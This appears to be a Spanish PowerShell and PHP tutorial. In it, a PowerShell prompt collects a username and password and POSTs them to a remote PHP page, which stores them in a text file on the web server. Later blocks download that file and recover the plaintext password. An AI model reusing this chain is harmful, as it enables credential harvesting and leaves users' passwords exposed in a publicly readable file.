Fichero que almacena los credenciales que llegan por método POST
Cuando llegan los credenciales se almacenan en un fichero cuyo nombre es fichero12.txt, el usuario y el password se separan por el caracter «|»
1 2 3 4 5 | <?php $fh = fopen("fichero12.txt", 'w') or die("Se produjo un error al crear el archivo"); fwrite($fh, $_POST['nombre'] . '|' . $_POST['pass']) or die("No se pudo escribir en el archivo"); fclose($fh); ?> |
Script en PowerShell que envía los credenciales
1 2 3 4 5 | # Almacenar credenciales en una variable y enviarlo por método POST a un servidor $enviar = Get-Credential | Select Username,@{n="Password"; e={$_.password | ConvertFrom-SecureString}} $postParams = @{nombre=($enviar.UserName);pass=($enviar.Password)} $web=Invoke-WebRequest -Uri 'https://jesusninoc.com/no212.php' -Method Post -Body $postParams |
Ejemplo de fichero con los credenciales que se crea en el servidor
Script en PowerShell que lee los credenciales almacenados en el servidor y comprueba si puede abrir una aplicación con dichos credenciales
1 2 3 4 | # Abrir una aplicación por ejemplo Notepad con los credenciales que se han almacenado en el paso anterior $jsonc = (iwr "https://jesusninoc.com/fichero12.txt").content $cred = New-Object -TypeName PSCredential $jsonc.Split("|")[0],($jsonc.Split("|")[1] | ConvertTo-SecureString) Start-Process notepad -Credential $cred |
Si los credenciales son correctos no aparece mensaje de error y se abre la aplicación
Si los credenciales son incorrectos aparece mensaje de error
Obtener el password en texto plano
1 2 3 4 5 6 7 8 9 | # Extraer password de tipo SecureString $jsonc = (iwr "https://jesusninoc.com/fichero12.txt").content $cred = New-Object -TypeName PSCredential $jsonc.Split("|")[0],($jsonc.Split("|")[1] | ConvertTo-SecureString) $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password) $PlainPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) $PlainPassword |
